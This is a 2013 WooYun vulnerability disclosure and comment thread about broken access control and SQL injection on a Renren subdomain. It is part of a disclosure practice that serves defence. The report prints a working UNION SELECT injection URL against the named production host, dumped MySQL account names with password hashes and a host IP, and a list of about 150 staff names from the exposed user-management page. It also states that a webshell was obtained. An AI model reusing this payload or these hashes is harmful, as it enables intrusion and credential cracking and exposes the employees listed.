当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-022040

漏洞标题:人人网某分站越权获得WEBSHELL.

相关厂商:人人网

漏洞作者: 工作专用

提交时间:2013-04-17 21:47

修复时间:2013-06-01 21:48

公开时间:2013-06-01 21:48

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-04-17: 细节已通知厂商并且等待厂商处理中
2013-04-18: 厂商已经确认,细节仅向厂商公开
2013-04-28: 细节向核心白帽子及相关领域专家公开
2013-05-08: 细节向普通白帽子公开
2013-05-18: 细节向实习白帽子公开
2013-06-01: 细节向公众公开

简要描述:

人人网某分站获得WEBSHELL.

详细说明:

越权访问
http://opm.yx.renren.com/user_manage.php
直接查看所有账号密码
越权访问
http://opm.yx.renren.com/user_manage.php
直接查看所有账号密码
朱慧佳 5 1 修改 删除
张元 3 1 修改 删除
高泰阳 0 1 修改 删除
艾佳佳 3 1 修改 删除
党兰 5 1 修改 删除
赵子墨 2 1 修改 删除
刘思 0 1 修改 删除
黄宗豪 0 1 修改 删除
蒲维丰 0 1 修改 删除
张淑婵 0 1 修改 删除
刘伟 0 1 修改 删除
李潇楠 0 1 修改 删除
张鹏 0 1 修改 删除
潘敏 0 1 修改 删除
李正新 0 1 修改 删除
徐倩雅 0 1 修改 删除
李世凡 5 1 修改 删除
林庆霖 0 1 修改 删除
徐莎莎 0 1 修改 删除
白玮 0 1 修改 删除
贺学威 0 1 修改 删除
严翠萍 0 1 修改 删除
张瑜 0 1 修改 删除
夏雷 0 1 修改 删除
徐冰 0 1 修改 删除
肖静 0 1 修改 删除
徐倩雅 0 1 修改 删除
赵蕾 5 1 修改 删除
陈贝 5 1 修改 删除
陈怡雯 0 1 修改 删除
朱倩 0 1 修改 删除
汪耀 0 1 修改 删除
李洋 0 1 修改 删除
董健敏 0 1 修改 删除
王旭 0 1 修改 删除
阮明沙 0 1 修改 删除
赵晶 0 1 修改 删除
许韬 0 1 修改 删除
吕大琳 0 1 修改 删除
陈高铭 0 1 修改 删除
林未乔 3 1 修改 删除
余冬 3 1 修改 删除
吕大琳 0 1 修改 删除
邹潇 3 1 修改 删除
林秋丽 0 1 修改 删除
居巍 0 1 修改 删除
陈天悦 5 1 修改 删除
赵蕾 3 1 修改 删除
张硕 3 1 修改 删除
刘巍 1 1 修改 删除
曹淼 1 1 修改 删除
胡永雄 4 1 修改 删除
吴小兰 4 1 修改 删除
无 5 1 修改 删除
马威 5 1 修改 删除
李珊 0 1 修改 删除
吕永鑫 2 1 修改 删除
周艳 2 1 修改 删除
郝小乔 0 1 修改 删除
王莉玲 0 1 修改 删除
董舒 2 1 修改 删除
王娟 0 1 修改 删除
夏丹寅 5 1 修改 删除
蒲维丰 5 1 修改 删除
张言数 3 1 修改 删除
胡永雄 3 1 修改 删除
冯钰璐 3 1 修改 删除
吴小兰 3 1 修改 删除
钟睿 2 1 修改 删除
内部 5 1 修改 删除
吴毅平 3 1 修改 删除
直签 5 1 修改 删除
关羽洁 0 1 修改 删除
郭嘉 5 1 修改 删除
李伟杰 5 1 修改 删除
翟军妮 5 1 修改 删除
窦萍 5 1 修改 删除
李正新 3 1 修改 删除
王沛然 5 1 修改 删除
朱晓倩 5 1 修改 删除
杨柯 5 1 修改 删除
舒超 5 1 修改 删除
何林 5 1 修改 删除
刘婷 5 1 修改 删除
周霞 5 1 修改 删除
张笑 5 1 修改 删除
董磊 5 1 修改 删除
金宁 5 1 修改 删除
张娜 5 1 修改 删除
董曼曼 5 1 修改 删除
胡晓平 5 1 修改 删除
康丹丹 5 1 修改 删除
谭琳 5 1 修改 删除
童舒心 5 1 修改 删除
杨洋 5 1 修改 删除
于涛 5 1 修改 删除
崔欣 5 1 修改 删除
田苓力 5 1 修改 删除
于光昊 5 1 修改 删除
刘雁翔 5 1 修改 删除
李蕾 5 1 修改 删除
吴宜轩 5 1 修改 删除
宋英洁 5 1 修改 删除
刘应荣 5 1 修改 删除
杨静 5 1 修改 删除
刘洁茵 5 1 修改 删除
谷维 5 1 修改 删除
陈皓 5 1 修改 删除
刘欢 3 1 修改 删除
惠珉璟 3 1 修改 删除
郭嵩 4 1 修改 删除
陈佳青 4 1 修改 删除
汪艳艳 4 1 修改 删除
李雁南 0 1 修改 删除
张扬 4 1 修改 删除
郑孟凡 4 1 修改 删除
泥惠芳 4 1 修改 删除
冯姝瑶 4 1 修改 删除
马春成 4 1 修改 删除
刘杨 4 1 修改 删除
伊楠 3 1 修改 删除
张佳梁 3 1 修改 删除
管丁 1 1 修改 删除
王梁 2 1 修改 删除
成倩 3 1 修改 删除
唐培蕾 3 1 修改 删除
冯海涛 2 1 修改 删除
刘昭 3 1 修改 删除
韩羽凌 2 1 修改 删除
王彬 3 1 修改 删除
方博 3 1 修改 删除
江伍龙 2 1 修改 删除
郁晓敏 3 1 修改 删除
李文赫 3 1 修改 删除
隋军 0 1 修改 删除
张继伟 3 1 修改 删除
李剑 3 1 修改 删除
闫闶 3 1 修改 删除
严秀娟 3 1 修改 删除
张莲庆 3 1 修改 删除
张东禹 1 1 修改 删除
马克菲 3 1 修改 删除
李凯荣 3 1 修改 删除
杨宋 0 1 修改 删除
于正 2 1 修改 删除
涂刚 2 1 修改 删除
马箐璟 2 1 修改 删除
甘露 3 1 修改 删除
宋琛瑶 2 1 修改 删除
杨阳 2 1 修改 删除
简沂蓁 0 1 修改 删除

1.jpg

2.jpg

3.jpg


http://opm.yx.renren.com/project_info.php?id=447 直接注射
http://opm.yx.renren.com/project_info.php?id=447%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,database(),8,9,0,1,2,3,4,5,6/*xx
Root
root::localhost
apps:*9AE87FC7EEE73219D93943706714B9A69B0B300B:%::localhost
yake:*9AE87FC7EEE73219D93943706714B9A69B0B300B:10.2.%
yake:*9AE87FC7EEE73219D93943706714B9A69B0B300B:%
ispconfig:73d465767e39eb77:localhost
suijun:19012f603a01ad5e:%
violin:71a4653336b50cfd:%
yake@211.100.39.191
随便翻翻库
http://opm.yx.renren.com/ct/

4.jpg

5.jpg

6.jpg


1 catest ******* catest j*********@renren-inc.com 2011-05-26 09:13:44 0 **********

7.jpg


先看能否拽个WEBSHELL

8.jpg


9.jpg


/etc/lighttpd/lighttpd.conf

1111.jpg


时间关系不继续深入下去.

漏洞证明:

越权访问
http://opm.yx.renren.com/user_manage.php
直接查看所有账号密码
越权访问
http://opm.yx.renren.com/user_manage.php
直接查看所有账号密码
朱慧佳 5 1 修改 删除
张元 3 1 修改 删除
高泰阳 0 1 修改 删除
艾佳佳 3 1 修改 删除
党兰 5 1 修改 删除
赵子墨 2 1 修改 删除
刘思 0 1 修改 删除
黄宗豪 0 1 修改 删除
蒲维丰 0 1 修改 删除
张淑婵 0 1 修改 删除
刘伟 0 1 修改 删除
李潇楠 0 1 修改 删除
张鹏 0 1 修改 删除
潘敏 0 1 修改 删除
李正新 0 1 修改 删除
徐倩雅 0 1 修改 删除
李世凡 5 1 修改 删除
林庆霖 0 1 修改 删除
徐莎莎 0 1 修改 删除
白玮 0 1 修改 删除
贺学威 0 1 修改 删除
严翠萍 0 1 修改 删除
张瑜 0 1 修改 删除
夏雷 0 1 修改 删除
徐冰 0 1 修改 删除
肖静 0 1 修改 删除
徐倩雅 0 1 修改 删除
赵蕾 5 1 修改 删除
陈贝 5 1 修改 删除
陈怡雯 0 1 修改 删除
朱倩 0 1 修改 删除
汪耀 0 1 修改 删除
李洋 0 1 修改 删除
董健敏 0 1 修改 删除
王旭 0 1 修改 删除
阮明沙 0 1 修改 删除
赵晶 0 1 修改 删除
许韬 0 1 修改 删除
吕大琳 0 1 修改 删除
陈高铭 0 1 修改 删除
林未乔 3 1 修改 删除
余冬 3 1 修改 删除
吕大琳 0 1 修改 删除
邹潇 3 1 修改 删除
林秋丽 0 1 修改 删除
居巍 0 1 修改 删除
陈天悦 5 1 修改 删除
赵蕾 3 1 修改 删除
张硕 3 1 修改 删除
刘巍 1 1 修改 删除
曹淼 1 1 修改 删除
胡永雄 4 1 修改 删除
吴小兰 4 1 修改 删除
无 5 1 修改 删除
马威 5 1 修改 删除
李珊 0 1 修改 删除
吕永鑫 2 1 修改 删除
周艳 2 1 修改 删除
郝小乔 0 1 修改 删除
王莉玲 0 1 修改 删除
董舒 2 1 修改 删除
王娟 0 1 修改 删除
夏丹寅 5 1 修改 删除
蒲维丰 5 1 修改 删除
张言数 3 1 修改 删除
胡永雄 3 1 修改 删除
冯钰璐 3 1 修改 删除
吴小兰 3 1 修改 删除
钟睿 2 1 修改 删除
内部 5 1 修改 删除
吴毅平 3 1 修改 删除
直签 5 1 修改 删除
关羽洁 0 1 修改 删除
郭嘉 5 1 修改 删除
李伟杰 5 1 修改 删除
翟军妮 5 1 修改 删除
窦萍 5 1 修改 删除
李正新 3 1 修改 删除
王沛然 5 1 修改 删除
朱晓倩 5 1 修改 删除
杨柯 5 1 修改 删除
舒超 5 1 修改 删除
何林 5 1 修改 删除
刘婷 5 1 修改 删除
周霞 5 1 修改 删除
张笑 5 1 修改 删除
董磊 5 1 修改 删除
金宁 5 1 修改 删除
张娜 5 1 修改 删除
董曼曼 5 1 修改 删除
胡晓平 5 1 修改 删除
康丹丹 5 1 修改 删除
谭琳 5 1 修改 删除
童舒心 5 1 修改 删除
杨洋 5 1 修改 删除
于涛 5 1 修改 删除
崔欣 5 1 修改 删除
田苓力 5 1 修改 删除
于光昊 5 1 修改 删除
刘雁翔 5 1 修改 删除
李蕾 5 1 修改 删除
吴宜轩 5 1 修改 删除
宋英洁 5 1 修改 删除
刘应荣 5 1 修改 删除
杨静 5 1 修改 删除
刘洁茵 5 1 修改 删除
谷维 5 1 修改 删除
陈皓 5 1 修改 删除
刘欢 3 1 修改 删除
惠珉璟 3 1 修改 删除
郭嵩 4 1 修改 删除
陈佳青 4 1 修改 删除
汪艳艳 4 1 修改 删除
李雁南 0 1 修改 删除
张扬 4 1 修改 删除
郑孟凡 4 1 修改 删除
泥惠芳 4 1 修改 删除
冯姝瑶 4 1 修改 删除
马春成 4 1 修改 删除
刘杨 4 1 修改 删除
伊楠 3 1 修改 删除
张佳梁 3 1 修改 删除
管丁 1 1 修改 删除
王梁 2 1 修改 删除
成倩 3 1 修改 删除
唐培蕾 3 1 修改 删除
冯海涛 2 1 修改 删除
刘昭 3 1 修改 删除
韩羽凌 2 1 修改 删除
王彬 3 1 修改 删除
方博 3 1 修改 删除
江伍龙 2 1 修改 删除
郁晓敏 3 1 修改 删除
李文赫 3 1 修改 删除
隋军 0 1 修改 删除
张继伟 3 1 修改 删除
李剑 3 1 修改 删除
闫闶 3 1 修改 删除
严秀娟 3 1 修改 删除
张莲庆 3 1 修改 删除
张东禹 1 1 修改 删除
马克菲 3 1 修改 删除
李凯荣 3 1 修改 删除
杨宋 0 1 修改 删除
于正 2 1 修改 删除
涂刚 2 1 修改 删除
马箐璟 2 1 修改 删除
甘露 3 1 修改 删除
宋琛瑶 2 1 修改 删除
杨阳 2 1 修改 删除
简沂蓁 0 1 修改 删除

1.jpg

2.jpg

3.jpg


http://opm.yx.renren.com/project_info.php?id=447 直接注射
http://opm.yx.renren.com/project_info.php?id=447%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,database(),8,9,0,1,2,3,4,5,6/*xx
Root
root::localhost
apps:*9AE87FC7EEE73219D93943706714B9A69B0B300B:%::localhost
yake:*9AE87FC7EEE73219D93943706714B9A69B0B300B:10.2.%
yake:*9AE87FC7EEE73219D93943706714B9A69B0B300B:%
ispconfig:73d465767e39eb77:localhost
suijun:19012f603a01ad5e:%
violin:71a4653336b50cfd:%
yake@211.100.39.191
随便翻翻库
http://opm.yx.renren.com/ct/

4.jpg

5.jpg

6.jpg


1 catest ******* catest j*********@renren-inc.com 2011-05-26 09:13:44 0 **********

7.jpg


先看能否拽个WEBSHELL

8.jpg


9.jpg


/etc/lighttpd/lighttpd.conf

1111.jpg


时间关系不继续深入下去.

修复方案:

多方面原因。

版权声明:转载请注明来源 工作专用@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2013-04-18 10:53

厂商回复:

Thanks!

最新状态:

暂无


漏洞评价:

评论

  1. 2013-04-17 21:58 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    mark/

  2. 2013-04-17 22:12 | zzR 认证白帽子 ( 核心白帽子 | Rank:1382 漏洞数:111 | 收wb 1:5 无限量收 [平台担保])

  3. 2013-04-17 22:40 | 无敌L.t.H ( 路人 | Rank:21 漏洞数:4 | ‮……肉肉捉活,亭长放解)

    ID:‮用专作工

  4. 2013-04-17 23:03 | whirlwind ( 实习白帽子 | Rank:34 漏洞数:7 | 极光肖风)

    我最喜欢人人了,,

  5. 2013-04-17 23:06 | lucky ( 普通白帽子 | Rank:409 漏洞数:81 | 三人行必有我师焉########################...)

    有一位大神出没!

  6. 2013-04-18 00:17 | 银冥币 ( 实习白帽子 | Rank:35 漏洞数:19 | "/upload/avatar/avatar_251_b.jpg" />)

    http://www.wooyun.org/bugs/wooyun-2013-021787/trace/47cd34fea3a082fa67a23ee7301dd405 求审核。。

  7. 2013-04-18 08:22 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:170 | 力不从心)

    都是大牛,舍得花时间啊

  8. 2013-04-18 10:02 | Demon ( 普通白帽子 | Rank:121 漏洞数:14 | You are my dream)

    马了也不看

  9. 2013-04-18 16:56 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    官方惊了,漏洞就精了

  10. 2013-04-18 17:04 | lucky ( 普通白帽子 | Rank:409 漏洞数:81 | 三人行必有我师焉########################...)

    又有一种新的方法可以学习了!

  11. 2013-04-18 20:04 | 工作专用 ( 实习白帽子 | Rank:77 漏洞数:6 | 起什么名字好呢。)

    @疯狗 又见疯狗! 哈哈sina某牛!

  12. 2013-04-22 12:42 | 工作专用 ( 实习白帽子 | Rank:77 漏洞数:6 | 起什么名字好呢。)

    @wefgod 2个小时啊

  13. 2013-05-08 11:56 | 钱途 ( 普通白帽子 | Rank:273 漏洞数:44 )

    mysql还开了外连

  14. 2013-05-08 16:18 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:170 | 力不从心)

    库已经到手了啊?

  15. 2013-05-18 13:07 | 紫藤居士 ( 实习白帽子 | Rank:43 漏洞数:8 | 我是来向大神们学习的)

    服务器上站点好诱人,^_^

  16. 2013-05-19 13:42 | 紫藤居士 ( 实习白帽子 | Rank:43 漏洞数:8 | 我是来向大神们学习的)

    @工作专用 能分享下这个查询C段的工具或者接口地址吗?

  17. 2013-06-02 01:57 | nauscript ( 普通白帽子 | Rank:291 漏洞数:57 | 我淫荡啊我淫荡)

    @紫藤居士 他貌似木有分析这个工具。。。同求